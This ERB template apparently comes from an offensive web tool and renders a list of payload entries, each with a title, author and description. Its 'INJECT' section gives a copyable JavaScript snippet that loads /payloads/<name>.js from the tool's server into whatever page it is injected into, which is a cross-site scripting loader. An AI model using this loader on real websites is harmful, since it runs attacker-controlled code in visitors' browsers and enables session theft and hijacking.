<% @entries.each_with_index do |entry, i| %>
<div class="entry <% if i == 0 %>expanded<% else %>collapsed<% end %>">
	<div class="titlebar">
		<a class="toggle" href="#"><span>collapse</span></a>
		<span class="title"><%=h entry.title %></span>
	</div>
	<table class="details">
		<% if !entry.author.empty? %>
		<tr>
			<th><span>AUTHOR</span></th>
			<td class="longwrap"><%=h entry.author %></td>
		</tr>
		<% end %>
		<% if !entry.description.empty? %>
		<tr>
			<th><span>INFO</span></th>
			<td><%=h entry.description %></td>
		</tr>
		<% end %>
		<tr>
			<th><span>INJECT</span></th>
			<td class="longwrap">
				<div class="injection">
					var x = document.createElement('script');
					x.src = '<%=h request.scheme %>://<%=h request.host %>:<%=h request.port %>/payloads/<%=h entry.shortname %>.js';
					document.body.appendChild(x);
				</div>
			</td>
		</tr>
	</table>
</div>
<% end %>
